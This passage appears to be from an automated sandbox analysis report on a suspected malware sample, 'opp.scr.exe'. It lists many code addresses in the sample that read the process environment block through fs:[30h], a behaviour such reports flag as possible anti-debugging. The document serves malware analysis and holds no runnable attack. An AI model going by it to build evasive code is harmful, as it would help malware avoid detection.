          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01732000 mov eax, dword ptr fs:[00000030h]1_2_01732000
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01732000 mov eax, dword ptr fs:[00000030h]1_2_01732000
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01732000 mov eax, dword ptr fs:[00000030h]1_2_01732000
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01732000 mov eax, dword ptr fs:[00000030h]1_2_01732000
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01732000 mov eax, dword ptr fs:[00000030h]1_2_01732000
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01732000 mov eax, dword ptr fs:[00000030h]1_2_01732000
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01732000 mov eax, dword ptr fs:[00000030h]1_2_01732000
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01732000 mov eax, dword ptr fs:[00000030h]1_2_01732000
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016AE016 mov eax, dword ptr fs:[00000030h]1_2_016AE016
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016AE016 mov eax, dword ptr fs:[00000030h]1_2_016AE016
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016AE016 mov eax, dword ptr fs:[00000030h]1_2_016AE016
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016AE016 mov eax, dword ptr fs:[00000030h]1_2_016AE016
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016980E9 mov eax, dword ptr fs:[00000030h]1_2_016980E9
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0168A0E3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017160E0 mov eax, dword ptr fs:[00000030h]1_2_017160E0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168C0F0 mov eax, dword ptr fs:[00000030h]1_2_0168C0F0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D20F0 mov ecx, dword ptr fs:[00000030h]1_2_016D20F0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017120DE mov eax, dword ptr fs:[00000030h]1_2_017120DE
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016880A0 mov eax, dword ptr fs:[00000030h]1_2_016880A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017560B8 mov eax, dword ptr fs:[00000030h]1_2_017560B8
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017560B8 mov ecx, dword ptr fs:[00000030h]1_2_017560B8
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017280A8 mov eax, dword ptr fs:[00000030h]1_2_017280A8
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169208A mov eax, dword ptr fs:[00000030h]1_2_0169208A
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173437C mov eax, dword ptr fs:[00000030h]1_2_0173437C
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01738350 mov ecx, dword ptr fs:[00000030h]1_2_01738350
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175A352 mov eax, dword ptr fs:[00000030h]1_2_0175A352
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171035C mov eax, dword ptr fs:[00000030h]1_2_0171035C
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171035C mov eax, dword ptr fs:[00000030h]1_2_0171035C
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171035C mov eax, dword ptr fs:[00000030h]1_2_0171035C
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171035C mov ecx, dword ptr fs:[00000030h]1_2_0171035C
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171035C mov eax, dword ptr fs:[00000030h]1_2_0171035C
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171035C mov eax, dword ptr fs:[00000030h]1_2_0171035C
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01712349 mov eax, dword ptr fs:[00000030h]1_2_01712349
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01712349 mov eax, dword ptr fs:[00000030h]1_2_01712349
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01712349 mov eax, dword ptr fs:[00000030h]1_2_01712349
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01712349 mov eax, dword ptr fs:[00000030h]1_2_01712349
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01712349 mov eax, dword ptr fs:[00000030h]1_2_01712349
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01712349 mov eax, dword ptr fs:[00000030h]1_2_01712349
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01712349 mov eax, dword ptr fs:[00000030h]1_2_01712349
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01712349 mov eax, dword ptr fs:[00000030h]1_2_01712349
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01712349 mov eax, dword ptr fs:[00000030h]1_2_01712349
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01712349 mov eax, dword ptr fs:[00000030h]1_2_01712349
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01712349 mov eax, dword ptr fs:[00000030h]1_2_01712349
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01712349 mov eax, dword ptr fs:[00000030h]1_2_01712349
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01712349 mov eax, dword ptr fs:[00000030h]1_2_01712349
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01712349 mov eax, dword ptr fs:[00000030h]1_2_01712349
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01712349 mov eax, dword ptr fs:[00000030h]1_2_01712349
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0176634F mov eax, dword ptr fs:[00000030h]1_2_0176634F
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01768324 mov eax, dword ptr fs:[00000030h]1_2_01768324
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01768324 mov ecx, dword ptr fs:[00000030h]1_2_01768324
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01768324 mov eax, dword ptr fs:[00000030h]1_2_01768324
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01768324 mov eax, dword ptr fs:[00000030h]1_2_01768324
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CA30B mov eax, dword ptr fs:[00000030h]1_2_016CA30B
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CA30B mov eax, dword ptr fs:[00000030h]1_2_016CA30B
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CA30B mov eax, dword ptr fs:[00000030h]1_2_016CA30B
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168C310 mov ecx, dword ptr fs:[00000030h]1_2_0168C310
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B0310 mov ecx, dword ptr fs:[00000030h]1_2_016B0310
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A03E9 mov eax, dword ptr fs:[00000030h]1_2_016A03E9
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A03E9 mov eax, dword ptr fs:[00000030h]1_2_016A03E9
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A03E9 mov eax, dword ptr fs:[00000030h]1_2_016A03E9
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A03E9 mov eax, dword ptr fs:[00000030h]1_2_016A03E9
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A03E9 mov eax, dword ptr fs:[00000030h]1_2_016A03E9
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A03E9 mov eax, dword ptr fs:[00000030h]1_2_016A03E9
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A03E9 mov eax, dword ptr fs:[00000030h]1_2_016A03E9
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A03E9 mov eax, dword ptr fs:[00000030h]1_2_016A03E9
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C63FF mov eax, dword ptr fs:[00000030h]1_2_016C63FF
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016AE3F0 mov eax, dword ptr fs:[00000030h]1_2_016AE3F0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016AE3F0 mov eax, dword ptr fs:[00000030h]1_2_016AE3F0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016AE3F0 mov eax, dword ptr fs:[00000030h]1_2_016AE3F0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017343D4 mov eax, dword ptr fs:[00000030h]1_2_017343D4
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017343D4 mov eax, dword ptr fs:[00000030h]1_2_017343D4
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173E3DB mov eax, dword ptr fs:[00000030h]1_2_0173E3DB
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173E3DB mov eax, dword ptr fs:[00000030h]1_2_0173E3DB
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173E3DB mov ecx, dword ptr fs:[00000030h]1_2_0173E3DB
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173E3DB mov eax, dword ptr fs:[00000030h]1_2_0173E3DB
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169A3C0 mov eax, dword ptr fs:[00000030h]1_2_0169A3C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169A3C0 mov eax, dword ptr fs:[00000030h]1_2_0169A3C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169A3C0 mov eax, dword ptr fs:[00000030h]1_2_0169A3C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169A3C0 mov eax, dword ptr fs:[00000030h]1_2_0169A3C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169A3C0 mov eax, dword ptr fs:[00000030h]1_2_0169A3C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169A3C0 mov eax, dword ptr fs:[00000030h]1_2_0169A3C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016983C0 mov eax, dword ptr fs:[00000030h]1_2_016983C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016983C0 mov eax, dword ptr fs:[00000030h]1_2_016983C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016983C0 mov eax, dword ptr fs:[00000030h]1_2_016983C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016983C0 mov eax, dword ptr fs:[00000030h]1_2_016983C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017163C0 mov eax, dword ptr fs:[00000030h]1_2_017163C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0174C3CD mov eax, dword ptr fs:[00000030h]1_2_0174C3CD
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168E388 mov eax, dword ptr fs:[00000030h]1_2_0168E388
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168E388 mov eax, dword ptr fs:[00000030h]1_2_0168E388
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168E388 mov eax, dword ptr fs:[00000030h]1_2_0168E388
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B438F mov eax, dword ptr fs:[00000030h]1_2_016B438F
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B438F mov eax, dword ptr fs:[00000030h]1_2_016B438F
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01688397 mov eax, dword ptr fs:[00000030h]1_2_01688397
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01688397 mov eax, dword ptr fs:[00000030h]1_2_01688397
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01688397 mov eax, dword ptr fs:[00000030h]1_2_01688397
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01740274 mov eax, dword ptr fs:[00000030h]1_2_01740274
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01740274 mov eax, dword ptr fs:[00000030h]1_2_01740274
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01740274 mov eax, dword ptr fs:[00000030h]1_2_01740274
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01740274 mov eax, dword ptr fs:[00000030h]1_2_01740274
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01740274 mov eax, dword ptr fs:[00000030h]1_2_01740274
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01740274 mov eax, dword ptr fs:[00000030h]1_2_01740274
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01740274 mov eax, dword ptr fs:[00000030h]1_2_01740274
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01740274 mov eax, dword ptr fs:[00000030h]1_2_01740274
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01740274 mov eax, dword ptr fs:[00000030h]1_2_01740274
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01740274 mov eax, dword ptr fs:[00000030h]1_2_01740274
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01740274 mov eax, dword ptr fs:[00000030h]1_2_01740274
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01740274 mov eax, dword ptr fs:[00000030h]1_2_01740274
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168826B mov eax, dword ptr fs:[00000030h]1_2_0168826B
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01694260 mov eax, dword ptr fs:[00000030h]1_2_01694260
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01694260 mov eax, dword ptr fs:[00000030h]1_2_01694260
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01694260 mov eax, dword ptr fs:[00000030h]1_2_01694260
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0174A250 mov eax, dword ptr fs:[00000030h]1_2_0174A250
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0174A250 mov eax, dword ptr fs:[00000030h]1_2_0174A250
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0176625D mov eax, dword ptr fs:[00000030h]1_2_0176625D
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01696259 mov eax, dword ptr fs:[00000030h]1_2_01696259
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01718243 mov eax, dword ptr fs:[00000030h]1_2_01718243
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01718243 mov ecx, dword ptr fs:[00000030h]1_2_01718243
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168A250 mov eax, dword ptr fs:[00000030h]1_2_0168A250
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168823B mov eax, dword ptr fs:[00000030h]1_2_0168823B
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A02E1 mov eax, dword ptr fs:[00000030h]1_2_016A02E1
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A02E1 mov eax, dword ptr fs:[00000030h]1_2_016A02E1
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A02E1 mov eax, dword ptr fs:[00000030h]1_2_016A02E1
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017662D6 mov eax, dword ptr fs:[00000030h]1_2_017662D6
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169A2C3 mov eax, dword ptr fs:[00000030h]1_2_0169A2C3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169A2C3 mov eax, dword ptr fs:[00000030h]1_2_0169A2C3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169A2C3 mov eax, dword ptr fs:[00000030h]1_2_0169A2C3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169A2C3 mov eax, dword ptr fs:[00000030h]1_2_0169A2C3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169A2C3 mov eax, dword ptr fs:[00000030h]1_2_0169A2C3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A02A0 mov eax, dword ptr fs:[00000030h]1_2_016A02A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A02A0 mov eax, dword ptr fs:[00000030h]1_2_016A02A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017262A0 mov eax, dword ptr fs:[00000030h]1_2_017262A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017262A0 mov ecx, dword ptr fs:[00000030h]1_2_017262A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017262A0 mov eax, dword ptr fs:[00000030h]1_2_017262A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017262A0 mov eax, dword ptr fs:[00000030h]1_2_017262A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017262A0 mov eax, dword ptr fs:[00000030h]1_2_017262A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017262A0 mov eax, dword ptr fs:[00000030h]1_2_017262A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CE284 mov eax, dword ptr fs:[00000030h]1_2_016CE284
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CE284 mov eax, dword ptr fs:[00000030h]1_2_016CE284
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01710283 mov eax, dword ptr fs:[00000030h]1_2_01710283
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01710283 mov eax, dword ptr fs:[00000030h]1_2_01710283
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01710283 mov eax, dword ptr fs:[00000030h]1_2_01710283
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C656A mov eax, dword ptr fs:[00000030h]1_2_016C656A
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C656A mov eax, dword ptr fs:[00000030h]1_2_016C656A
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C656A mov eax, dword ptr fs:[00000030h]1_2_016C656A
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01698550 mov eax, dword ptr fs:[00000030h]1_2_01698550
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01698550 mov eax, dword ptr fs:[00000030h]1_2_01698550
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BE53E mov eax, dword ptr fs:[00000030h]1_2_016BE53E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BE53E mov eax, dword ptr fs:[00000030h]1_2_016BE53E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BE53E mov eax, dword ptr fs:[00000030h]1_2_016BE53E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BE53E mov eax, dword ptr fs:[00000030h]1_2_016BE53E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BE53E mov eax, dword ptr fs:[00000030h]1_2_016BE53E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0535 mov eax, dword ptr fs:[00000030h]1_2_016A0535
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0535 mov eax, dword ptr fs:[00000030h]1_2_016A0535
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0535 mov eax, dword ptr fs:[00000030h]1_2_016A0535
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0535 mov eax, dword ptr fs:[00000030h]1_2_016A0535
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0535 mov eax, dword ptr fs:[00000030h]1_2_016A0535
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0535 mov eax, dword ptr fs:[00000030h]1_2_016A0535
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01726500 mov eax, dword ptr fs:[00000030h]1_2_01726500
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01764500 mov eax, dword ptr fs:[00000030h]1_2_01764500
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01764500 mov eax, dword ptr fs:[00000030h]1_2_01764500
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01764500 mov eax, dword ptr fs:[00000030h]1_2_01764500
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01764500 mov eax, dword ptr fs:[00000030h]1_2_01764500
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01764500 mov eax, dword ptr fs:[00000030h]1_2_01764500
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01764500 mov eax, dword ptr fs:[00000030h]1_2_01764500
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01764500 mov eax, dword ptr fs:[00000030h]1_2_01764500
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CC5ED mov eax, dword ptr fs:[00000030h]1_2_016CC5ED
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CC5ED mov eax, dword ptr fs:[00000030h]1_2_016CC5ED
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016925E0 mov eax, dword ptr fs:[00000030h]1_2_016925E0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BE5E7 mov eax, dword ptr fs:[00000030h]1_2_016BE5E7
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BE5E7 mov eax, dword ptr fs:[00000030h]1_2_016BE5E7
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BE5E7 mov eax, dword ptr fs:[00000030h]1_2_016BE5E7
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BE5E7 mov eax, dword ptr fs:[00000030h]1_2_016BE5E7
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BE5E7 mov eax, dword ptr fs:[00000030h]1_2_016BE5E7
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BE5E7 mov eax, dword ptr fs:[00000030h]1_2_016BE5E7
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BE5E7 mov eax, dword ptr fs:[00000030h]1_2_016BE5E7
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BE5E7 mov eax, dword ptr fs:[00000030h]1_2_016BE5E7
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CE5CF mov eax, dword ptr fs:[00000030h]1_2_016CE5CF
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CE5CF mov eax, dword ptr fs:[00000030h]1_2_016CE5CF
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016965D0 mov eax, dword ptr fs:[00000030h]1_2_016965D0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CA5D0 mov eax, dword ptr fs:[00000030h]1_2_016CA5D0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CA5D0 mov eax, dword ptr fs:[00000030h]1_2_016CA5D0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017105A7 mov eax, dword ptr fs:[00000030h]1_2_017105A7
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017105A7 mov eax, dword ptr fs:[00000030h]1_2_017105A7
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017105A7 mov eax, dword ptr fs:[00000030h]1_2_017105A7
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B45B1 mov eax, dword ptr fs:[00000030h]1_2_016B45B1
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B45B1 mov eax, dword ptr fs:[00000030h]1_2_016B45B1
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C4588 mov eax, dword ptr fs:[00000030h]1_2_016C4588
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01692582 mov eax, dword ptr fs:[00000030h]1_2_01692582
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01692582 mov ecx, dword ptr fs:[00000030h]1_2_01692582
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CE59C mov eax, dword ptr fs:[00000030h]1_2_016CE59C
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171C460 mov ecx, dword ptr fs:[00000030h]1_2_0171C460
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BA470 mov eax, dword ptr fs:[00000030h]1_2_016BA470
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BA470 mov eax, dword ptr fs:[00000030h]1_2_016BA470
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BA470 mov eax, dword ptr fs:[00000030h]1_2_016BA470
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0174A456 mov eax, dword ptr fs:[00000030h]1_2_0174A456
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CE443 mov eax, dword ptr fs:[00000030h]1_2_016CE443
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CE443 mov eax, dword ptr fs:[00000030h]1_2_016CE443
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CE443 mov eax, dword ptr fs:[00000030h]1_2_016CE443
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CE443 mov eax, dword ptr fs:[00000030h]1_2_016CE443
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CE443 mov eax, dword ptr fs:[00000030h]1_2_016CE443
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CE443 mov eax, dword ptr fs:[00000030h]1_2_016CE443
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CE443 mov eax, dword ptr fs:[00000030h]1_2_016CE443
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CE443 mov eax, dword ptr fs:[00000030h]1_2_016CE443
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B245A mov eax, dword ptr fs:[00000030h]1_2_016B245A
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168645D mov eax, dword ptr fs:[00000030h]1_2_0168645D
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168E420 mov eax, dword ptr fs:[00000030h]1_2_0168E420
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168E420 mov eax, dword ptr fs:[00000030h]1_2_0168E420
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168E420 mov eax, dword ptr fs:[00000030h]1_2_0168E420
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168C427 mov eax, dword ptr fs:[00000030h]1_2_0168C427
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01716420 mov eax, dword ptr fs:[00000030h]1_2_01716420
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01716420 mov eax, dword ptr fs:[00000030h]1_2_01716420
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01716420 mov eax, dword ptr fs:[00000030h]1_2_01716420
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01716420 mov eax, dword ptr fs:[00000030h]1_2_01716420
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01716420 mov eax, dword ptr fs:[00000030h]1_2_01716420
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01716420 mov eax, dword ptr fs:[00000030h]1_2_01716420
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01716420 mov eax, dword ptr fs:[00000030h]1_2_01716420
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CA430 mov eax, dword ptr fs:[00000030h]1_2_016CA430
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C8402 mov eax, dword ptr fs:[00000030h]1_2_016C8402
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C8402 mov eax, dword ptr fs:[00000030h]1_2_016C8402
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C8402 mov eax, dword ptr fs:[00000030h]1_2_016C8402
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016904E5 mov ecx, dword ptr fs:[00000030h]1_2_016904E5
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171A4B0 mov eax, dword ptr fs:[00000030h]1_2_0171A4B0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016964AB mov eax, dword ptr fs:[00000030h]1_2_016964AB
